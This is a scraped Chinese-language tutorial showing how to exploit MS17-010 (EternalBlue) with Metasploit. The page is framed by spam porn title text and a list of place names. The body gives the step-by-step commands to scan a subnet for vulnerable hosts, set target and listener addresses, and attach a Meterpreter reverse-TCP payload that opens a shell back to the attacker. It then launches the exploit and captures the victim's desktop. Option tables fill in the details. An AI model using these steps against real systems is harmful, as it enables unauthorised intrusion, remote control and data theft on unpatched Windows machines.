亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

使用MSF對MS17-010的利用演示

發布時間:2020-06-24 01:57:07 來源:網絡 閱讀:18342 作者:1inux 欄目:安全技術

過程:

    1、掃描: 信息搜集(刺探)

    2、漏洞利用


一、首先檢測網段內存在漏洞的主機系統:

使用命令:

msf > use auxiliary/scanner/smb/smb_ms17_010        //加載掃描exp
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24    //配置掃描網段
msf auxiliary(scanner/smb/smb_ms17_010) > run        //進行掃描

結果如下:

使用MSF對MS17-010的利用演示

二、漏洞利用

msf利用命令如下:

msf > use exploit/windows/smb/ms17_010_eternalblue          //加載***模塊
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25      //配置***目標IP
RHOSTS => 192.168.22.25
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146        //配置本機IP
LHOST => 192.168.5.146
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp     //配置回鏈方式
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) >

查看當前配置的payload

msf exploit(windows/smb/ms17_010_eternalblue) > show options    //查看配置選項

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.22.25    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.5.146    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(windows/smb/ms17_010_eternalblue) >


發起***:

***命令: 
msf exploit(windows/smb/ms17_010_eternalblue) > exploit        //發起***

使用MSF對MS17-010的利用演示

獲取對方電腦桌面:

meterpreter > screenshot
Screenshot saved to: /root/RBDEvfGv.jpeg    //可以到root目錄下 查看對方電腦的截屏

獲取shel權限

使用MSF對MS17-010的利用演示

有關更多獲取權限后的***技巧, 請自行百度  msf 后*** ***模塊

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

台湾省| 日喀则市| 平乡县| 闻喜县| 高阳县| 沂南县| 安义县| 房产| 米易县| 依兰县| 兴义市| 淳安县| 尚义县| 汉寿县| 丽水市| 双柏县| 海阳市| 麻城市| 海盐县| 修武县| 苗栗市| 洛宁县| 融水| 连州市| 图木舒克市| 宁乡县| 济宁市| 印江| 泗阳县| 绍兴市| 日土县| 措勤县| 红河县| 阜阳市| 刚察县| 昭通市| 丰县| 江津市| 江城| 浮梁县| 长沙市|